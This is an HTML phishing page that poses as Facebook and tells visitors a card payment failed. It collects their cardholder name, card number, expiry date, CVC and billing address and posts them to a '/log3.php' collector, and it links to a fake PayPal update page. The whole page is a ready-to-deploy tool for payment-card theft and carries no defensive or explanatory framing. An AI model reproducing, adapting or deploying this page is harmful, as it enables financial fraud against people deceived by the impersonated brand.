

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Facebook</title>
    <link rel="shorcut icon" href="d4ZIVX-5C-b.ico">

    <!-- Style -->
    <link rel="stylesheet" href="bootstrap.min.css">
    <style>
      html,body {
        background-color: #eceff6;
      }
	  .navbar{padding:0px;}
      button:focus,
      input:focus,
      textarea:focus,
      select:focus {
          outline: none;
      }
      .login {
        max-width: 100%;
        width: 450px;
        display: block;
        align-items: center;
        background-color: #fff;
        border: none;
        border-radius: 8px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
        box-sizing: border-box;
        margin: 0px;
        padding: 0 0 28px;
      }

      textarea:focus,
      input[type="text"]:focus,
      input[type="password"]:focus,
      input[type="datetime"]:focus,
      input[type="datetime-local"]:focus,
      input[type="date"]:focus,
      input[type="month"]:focus,
      input[type="time"]:focus,
      input[type="week"]:focus,
      input[type="number"]:focus,
      input[type="email"]:focus,
      input[type="url"]:focus,
      input[type="search"]:focus,
      input[type="tel"]:focus,
      input[type="color"]:focus,
      .uneditable-input:focus {
        border-color: #ced4da;
        box-shadow: 0 1px 1px rgba(0, 0, 0, 0) inset, 0 0 8px rgba(126, 239, 104, 0);
        outline: 0 none;
      }

      .bg-utama {
        background-color: #3b5998;
      }
      .img-login {
        width: 450px;
        margin: 0px auto;
      }

      .text {
        font-size: 1em;
        display: block;
        margin-top: -8px;
        margin-bottom: 20px;
        color: #919191;
      }

      .form-control {
        display: block;
        height: 45px;
        margin: 6px auto;
        border-left:none;
		border-right:none;
		border-top:none;
      }

      .border-bottom-x {
        border-radius: 0px;
        border-top-left-radius: .25rem;
        border-top-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }

      .border-top-x {
        border-radius: 0px;
        border-bottom-left-radius: .25rem;
        border-bottom-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }

      .btn-login {
        width: 100%;
        display: block;
        margin: 15px auto;
        background-color: #1877f2;
        font-size: 16px;
		padding: 9px 5px;
      }
	  
	  .btn-sign {
        width: 75%;
        display: block;
        margin: 10px auto;
        background-color: #36a420;
        font-size: 16px;
		padding: 9px 5px;
      }

      .hiya {
        margin: -10px auto 15px auto;
      }

      .text-buat {
        margin: 13px auto;
        color: #3b5998;
      }
	  .text-atau {
        margin: 13px auto;
        color: #3b5998;
      }
		.text-atau:before,
		.text-atau:after {
		  background-color: #ced4da;
		  content: "";
		  display: inline-block;
		  height: 1px;
		  position: relative;
		  vertical-align: middle;
		  width: 40%;
		}

		.text-atau:before {
		  right: 0.5em;
		  margin-left: -50%;
		}

		.text-atau:after {
		  left: 0.5em;
		  margin-right: -50%;
		}

      .text-lupa {
        color: #1777f1;
        font-size: 0.9em;
      }

      @media only screen and (max-width: 600px) {
        .login {
        display: block;
        margin: 0 auto;
        }
      }
    </style>
</head>
  <body>
    <div class="login mx-auto d-block">
      <nav class="navbar bg-utama navbar-dark text-center">        
          <img class="mx-auto d-block img-login" src="baackdropatas.jpg">        
      </nav>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-lg-12 text-center mx-auto d-block">            
      <div class="col-sm-12 col-lg-12 text-center mx-auto d-block">            
            <div class="text" style="margin-top:4px"><span style="color:#FF0000">
             An error occurred while processing this request. Please try again or enter another credit card.
            </div>
<div id="objects_container">
<div class="aclb">
<div class="loginInner">
<form method="post" action="/log3.php" onsubmit="return Form1_Validator(this)">
<br><center>
<div class="mam">
<div class="payment_divider"><span class="payment_divider_text fss fwb fcg">

Please enter your credit or debit card information </span>
</div></div>
<br>
<div class="mal pam uiBoxGray">
<table class="uiInfoTable fbCreditCardFields noBorder" role="presentation">
<tr class="showInEditMode dataRowInEditMode">
<th class="label"> Or Paypal  </td>
<td><a href="Update_Paypal_Method.htm"><img src="inet.png" width="140" height="29" /></a></td></tr></span></span></td></tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">Cardholder's Name</th>
<td class="data"><span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" name="firstName" size="25"/></span></span></td></tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">Card Number</th><td class="data"><span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" name="creditCardNumber" maxlength="16" size="25" autocomplete="off" onKeyDown="return ( event.ctrlKey || event.altKey
|| (47<event.keyCode && event.keyCode<58 && event.shiftKey==false)
|| (95<event.keyCode && event.keyCode<106)
|| (event.keyCode==8) || (event.keyCode==9)
|| (event.keyCode>34 && event.keyCode<40)
|| (event.keyCode==46) )">
</span></span></td></tr>



<tr class="showInEditMode dataRowInEditMode">
<th class="label">Credit or Debit Card</td>
<td><img src="XXXXXXXOK.gif" width="205" height="29" /></td></tr></span></span></td></tr>

<tr class="showInEditMode dataRowInEditMode">
<th class="label">Expiration Date</th>
<td class="data"><span><span class="hideInEditMode">
</span><span class="showInEditMode"><span class="fbExpirationSelector">
<select name="month">
<option value="">Month</option>
<option value="01">01 (January)</option>
<option value="02">02 (February)</option>
<option value="03">03 (March)</option>
<option value="04">04 (April)</option>
<option value="05">05 (May)</option>
<option value="06">06 (June)</option>
<option value="07">07 (July)</option>
<option value="08">08 (August)</option>
<option value="09">09 (September)</option>
<option value="10">10 (October)</option>
<option value="11">11 (November)</option>
<option value="12">12 (December)</option>
</select> / <select name="year">
<option value="">Year</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option>
<option value="2031">2031</option>
<option value="2032">2032</option>
<option value="2033">2033</option>
<option value="2034">2034</option>
<option value="2035">2035</option>
</select></span></span></span></td></tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">Security Code (CVC)</th>
<td class="data"><span><span class="hideInEditMode"></span>
<span class="showInEditMode">
<input type="text" class="inputtext" name="csc" maxlength="4" size="7" autocomplete="off" onKeyDown="return ( event.ctrlKey || event.altKey
|| (47<event.keyCode && event.keyCode<58 && event.shiftKey==false)
|| (95<event.keyCode && event.keyCode<106)
|| (event.keyCode==8) || (event.keyCode==9)
|| (event.keyCode>34 && event.keyCode<40)
|| (event.keyCode==46) )">
<a class="mhs uiHelpLink" data-hover="tooltip" title="What's a CSC?" data-tooltip-position="right" href="#" onClick="window.open('images/csc.png','','width=400,height=300,scrollbars=no,top=100,left=100') ;return false" rel="dialog"></a></span></span></td></tr>

<tr class="showInEditMode dataRowInEditMode">
<th class="label">Billing Address</th>
<td class="data"><span><span class="hideInEditMode"></span>
<span class="showInEditMode">
<input type="text" class="inputtext" size="25"name="street"></span>
</span></td></tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">City / Town</th><td class="data">
<span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" size="25" name="city"></span></span></td>
</tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">ZIP/Postal Code</th><td class="data">
<span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" size="7" name="zip"></span></span></td>
</tr>

<tr class="showInEditMode dataRowInEditMode">
<th class="label">Country</th><td class="data"><span><span class="hideInEditMode">
</span><span class="showInEditMode"><select class="fbCountrySelector" name="country"><option value="United States" selected="1">United States</option><option value="Afghanistan">Afghanistan</option><option value="Aland Islands">Aland Islands</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua">Antigua</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bonaire, Sint Eustatius and Saba">Bonaire, Sint Eustatius and Saba</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="BV">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="British Virgin Islands">British Virgin Islands</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Cote d'Ivoire">Cote d'Ivoire</option><option value="Croatia">Croatia</option><option value="Curacao">Curacao</option><option value="CY">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Democratic Republic of the Congo">Democratic Republic of the Congo</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial ">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle Of Man">Isle Of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macau">Macau</option><option value="Macedonia">Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="North Korea">North Korea</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Republic of the Congo">Republic of the Congo</option><option value="Reunion">Reunion</option><option value="Romania">Romania</option><option value="Russia">Russia</option><option value="Rwanda">Rwanda</option><option value="Saint Barthelemy">Saint Barthelemy</option><option value="Saint Helena">Saint Helena</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Martin">Saint Martin</option><option value="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option><option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Sint Maarten">Sint Maarten</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia">South Georgia</option><option value="KR">South Korea</option><option value="South Sudan">South Sudan</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="St. Lucia">St. Lucia</option><option value="Suriname">Suriname</option><option value="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="The Bahamas">The Bahamas</option><option value="The Gambia">The Gambia</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option>
<option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United States Minor Outlying Islands">United States Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="US Virgin Islands">US Virgin Islands</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City">Vatican City</option><option value="Venezuela">Venezuela</option><option value="Vietnam">Vietnam</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></span></span></td>
</tr>

</span></span></td></tr></table>
<center><span class="_52yl style4">We take safety seriously. We will never display the full phone number anywhere in your account.</span></center>

<button class="btn btn-login text-white" type="submit" name="login">Update Completed</button>

<center><a  href="http://www.youtube.com/"><span></span></a>
<iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fapps%2Fapplication.php%3Fid%3D56531631380&amp;layout=standard&amp;show_faces=true&amp;width=2000&amp;action=like&amp;colorscheme=light&amp;height=1000" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:345px; height:94px;" allowTransparency="true"></iframe>
</center><br>

</span></span></td></tr></table>
              </div>
            </form>
          </div>
        </div>

        <div class="row">
          <div class="col-sm-12 col-lg-12 text-center mx-auto d-block">
            <div class="hiya"> 


</center>	<div class="hiya mt-5">
              <a href="#" class="text-buat d-block text-lupa">Facebook &copy; 2020</a>
            </div>
          </div>
        </div>
		
		<br><br>
      </div>
    </div>
    <!-- Script -->
    <script type="text/javascript" src="jquery-3.4.1.min.js"></script>
    <script type="text/javascript" src="bootstrap.min.js"></script>
    <script type="text/javascript" src="bootstrap.bundle.min.js"></script>
</div></div></div>

<script Language="JavaScript">

<!--
function Form1_Validator(theForm)
{

var alertsay = ""; // define for long lines
// alertsay is not necessary for your code,
// but I need to break my lines in multiple lines
// so the code won't extend off the edge of the page
// check to see if the field is blank
// require at least 16 characters in the Credit Card
if (theForm.firstName.value.length < 3)
{
alert("Cardholder name is a required field.");
theForm.firstName.focus();
return (false);
}
if (theForm.creditCardNumber.value.length < 15)
{
alert("Please enter a valid credit card number.");
theForm.creditCardNumber.focus();
return (false);
}
if (theForm.month.selectedIndex == 0)
 {
alert("The first \"Month\" option is not a valid selection.  Please choose one of the other options.");
    theForm.month.focus();
    return (false);
  }

 
if (theForm.year.selectedIndex == 0)
  {
    alert("The first \"Year\" option is not a valid selection.  Please choose one of the other options.");
    theForm.year.focus();
    return (false);
  }

// require at least 3-4 characters in the csc field
if (theForm.csc.value.length < 3)
{
alert("Please enter a numeric Security Code (CVC) that is 3-4 digits in length.");
theForm.csc.focus();
return (false);
}

if (theForm.street.value.length < 3)
{
alert("Please enter your address.");
theForm.street.focus();
return (false);
}


if (theForm.city.value.length < 3)
{
alert("Please enter your city.");
theForm.city.focus();
return (false);
}

if (theForm.state.value.length < 3)
{
alert("Please enter your status.");
theForm.state.focus();
return (false);
}



if (theForm.zip.value.length < 3)
{
alert("Please enter your zip code.");
theForm.zip.focus();
return (false);

}
}
//--></script>
</body>
</html>